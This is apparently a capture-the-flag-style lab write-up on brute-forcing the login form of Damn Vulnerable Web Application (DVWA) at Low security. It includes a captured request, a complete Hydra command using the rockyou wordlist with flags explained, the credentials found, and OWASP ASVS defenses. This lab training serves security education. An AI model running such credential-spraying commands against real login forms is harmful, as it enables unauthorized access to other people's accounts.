DVWA — Brute Force (Low)
Hydra against the basic login form. No CSRF, no lockout, no rate limit — textbook target.
Setup
Damn Vulnerable Web Application's Brute Force module at security level Low posts to vulnerabilities/brute/ with parameters username, password, and Login. There is no CSRF token, no captcha, and no lockout — so we can spray with a credential wordlist.
Capture the request
Log into DVWA, set security to Low, open vulnerabilities/brute/ and submit anything. In Burp/your browser's network panel you'll see:
GET /vulnerabilities/brute/?username=admin&password=test&Login=Login HTTP/1.1
Cookie: PHPSESSID=...; security=low
The response includes the string Username and/or password incorrect. on failure. That's our negative-match signal.
Run Hydra
hydra \
-l admin \
-P /usr/share/wordlists/rockyou.txt \
-e ns \
-t 8 \
-f \
127.0.0.1 \
http-get-form \
"/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=<your-sid>; security=low"Flags:
| Flag | Meaning |
|---|---|
-l admin | single login name |
-P file | password list |
-e ns | also try the username as the password, and empty |
-t 8 | 8 parallel tasks |
-f | stop on first hit |
F=incorrect | failure marker in the response body |
H=Cookie: ... | pinned session so DVWA accepts our requests |
Hydra finds admin:password within seconds — a pairing that lives at the top of every default credential list.
Why "low" is the easy mode
- No CSRF token → no need to GET first to extract a nonce per attempt
- No lockout → unlimited attempts
- No timing jitter → 8-thread concurrency is fine
- Plain GET form → trivial to fuzz
The Medium level adds an artificial sleep on failure and High introduces a per-request CSRF token (user_token) you have to scrape and resubmit. We'll cover those in their own writeups.
Defense reading
OWASP ASVS V2 (Authentication) covers the controls every login form should ship with:
- Per-user lockout / exponential backoff
- Standardized error messages (no "username not found" vs "wrong password" split)
- Rate limiting by IP, account, and credential pair
- CAPTCHA after N failures
- 2FA where the data is worth protecting